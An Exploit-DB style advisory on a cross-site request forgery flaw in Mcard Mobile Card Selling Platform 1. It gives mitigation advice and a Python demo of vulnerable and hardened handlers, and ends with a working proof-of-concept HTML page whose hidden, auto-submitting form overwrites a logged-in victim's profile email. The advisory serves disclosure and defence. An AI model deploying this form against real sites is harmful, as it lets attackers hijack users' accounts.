Vendor: Mcard Mobile Card Selling Platform
By: L0RD
CVSS: 3.1 (LOW)
CWE: 352 (Cross-Site Request Forgery)
Product Name: Mcard Mobile Card Selling Platform
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:codecanyon:mcard_mobile_card_selling_platform
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
Year: 2018

Mcard – Mobile Card Selling Platform 1 – Cross-Site Request Forgery

Mcard is vulnerable to Cross-Site Request Forgery (CSRF). The profile-update endpoint (/card/profile) accepts a POST carrying the new first name, last name and e-mail address and authenticates it by the session cookie alone: no anti-CSRF token, Origin/Referer check or SameSite cookie restriction is enforced. An attacker can therefore host an HTML page containing a hidden, auto-submitting form aimed at that endpoint. When a logged-in Mcard user visits the page, the browser attaches the user's session cookie to the forged POST and the profile is silently overwritten with attacker-chosen values, including the account e-mail address.

Mitigation:

Require a per-session synchronizer (anti-CSRF) token in every state-changing form and verify it server-side before /card/profile processes the request; set the session cookie with the SameSite attribute (Lax or Strict) so browsers do not attach it to cross-site POSTs; and reject state-changing requests whose Origin or Referer header names another site. Note that the HttpOnly flag does not mitigate CSRF: the attack never reads the cookie, it only needs the browser to send it. HttpOnly remains good practice, but against cookie theft via XSS, not against this issue.
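The following is an added illustration, not code from the advisory or from Mcard itself. It models the /card/profile POST as a plain function on an in-memory session store and shows the endpoint as the PoC exploits it next to a hardened version that enforces a per-session synchronizer token and an Origin/Referer check, and emits a SameSite=Lax session cookie. The site origin "http://Target", the hidden field name "_token", the Request/Session shapes and the attacker origin are assumptions for the demo.

```python
"""Vulnerable vs. hardened handling of the /card/profile POST targeted by the PoC."""
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

SITE_ORIGIN = "http://Target"  # assumed; "Target" is the placeholder host from the PoC


@dataclass
class Request:
    method: str
    path: str
    cookies: dict
    form: dict
    headers: dict = field(default_factory=dict)


@dataclass
class Session:
    user: str
    profile: dict
    # Per-session synchronizer token, minted once at login (assumed design).
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


SESSIONS: dict = {}  # in-memory stand-in for the app's session store


def login(user: str):
    """Create a session; returns (sid, the Set-Cookie header the app should emit)."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = Session(user, {"fname": user, "lname": "", "email": f"{user}@example.invalid"})
    # SameSite=Lax keeps the cookie off a top-level cross-site POST such as the PoC's
    # auto-submitted form. HttpOnly is unrelated to CSRF; it only stops script reading the cookie.
    return sid, f"sid={sid}; Path=/; HttpOnly; SameSite=Lax"


def session_for(req: Request):
    return SESSIONS.get(req.cookies.get("sid"))


def render_profile_form(sess: Session) -> str:
    """Legitimate form: carries the token as a hidden field the attacker's page cannot know."""
    return (f'<form action="/card/profile" method="POST">'
            f'<input type="hidden" name="_token" value="{sess.csrf_token}">'
            f'<input name="fname" value="{sess.profile["fname"]}"></form>')


def vulnerable_profile_update(req: Request):
    """Behaves like the endpoint the PoC exploits: the session cookie is the only check."""
    sess = session_for(req)
    if sess is None or req.method != "POST":
        return 401, "not logged in"
    sess.profile.update({k: req.form[k] for k in ("fname", "lname", "email") if k in req.form})
    return 200, "updated"


def same_origin(req: Request) -> bool:
    """Defence in depth: if Origin (or Referer) is present it must name this site."""
    src = req.headers.get("Origin") or req.headers.get("Referer")
    if not src:
        return True  # header stripped by policy; the token check below still applies
    want, got = urlsplit(SITE_ORIGIN), urlsplit(src)
    return (got.scheme, got.netloc) == (want.scheme, want.netloc)


def hardened_profile_update(req: Request):
    sess = session_for(req)
    if sess is None or req.method != "POST":
        return 401, "not logged in"
    if not same_origin(req):
        return 403, "cross-site request rejected"
    # Constant-time comparison; a plain == would leak token bytes via timing.
    if not hmac.compare_digest(req.form.get("_token", ""), sess.csrf_token):
        return 403, "missing or invalid CSRF token"
    sess.profile.update({k: req.form[k] for k in ("fname", "lname", "email") if k in req.form})
    return 200, "updated"


def demo() -> dict:
    """Replay a PoC-style POST against both handlers, then a legitimate tokenised POST."""
    forged = {"fname": "decode", "lname": "test", "email": "attacker@example.invalid"}  # constructed
    evil = {"Origin": "http://attacker.invalid"}  # constructed attacker origin
    r = {}
    sid, _ = login("victim")
    r["poc_vs_vulnerable"] = vulnerable_profile_update(Request("POST", "/card/profile", {"sid": sid}, forged, evil))[0]
    r["email_after_vulnerable"] = SESSIONS[sid].profile["email"]
    sid2, _ = login("victim2")
    sess2 = SESSIONS[sid2]
    r["poc_vs_hardened"] = hardened_profile_update(Request("POST", "/card/profile", {"sid": sid2}, forged, evil))[0]
    # Even with a same-site Origin, a post lacking the token is refused.
    r["no_token_vs_hardened"] = hardened_profile_update(
        Request("POST", "/card/profile", {"sid": sid2}, forged, {"Origin": SITE_ORIGIN}))[0]
    r["email_after_hardened"] = sess2.profile["email"]
    legit = Request("POST", "/card/profile", {"sid": sid2}, dict(forged, _token=sess2.csrf_token), {"Origin": SITE_ORIGIN})
    r["legit_vs_hardened"] = hardened_profile_update(legit)[0]
    r["email_after_legit"] = sess2.profile["email"]
    return r


if __name__ == "__main__":
    print(demo())
```

The token check is the primary control; the Origin check and SameSite=Lax are layered on top because each alone has gaps (some clients strip Referer, and older browsers ignore SameSite).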

Exploit-DB raw data:

# Exploit Title:  Mcard - Mobile Card Selling Platform 1 - Cross-Site Request Forgery
# Date: 2018-05-23
# Exploit Author: L0RD
# Vendor Homepage: https://codecanyon.net/item/mcard-mobile-card-selling-platform/19307193?s_rank=15
# Version: 1
# Tested on: Kali linux

# POC :

<html>
<head>
   <title>CSRF POC</title>
</head>
<body>
    <!-- Hidden form aimed at the profile-update endpoint; replace "Target" with the Mcard host.
         The victim's browser attaches the session cookie, so the values below overwrite the profile. -->
    <form action="http://Target/card/profile" method="POST">
      <input type="hidden" name="fname" value="decode" />
      <input type="hidden" name="lname" value="test" />
      <input type="hidden" name="email" value="lord&#46;decode&#64;gmail&#46;com" />
    </form>
 <script>
   // Submit the form as soon as the page loads; no user interaction is needed.
   document.forms[0].submit();
 </script>
</body>
</html>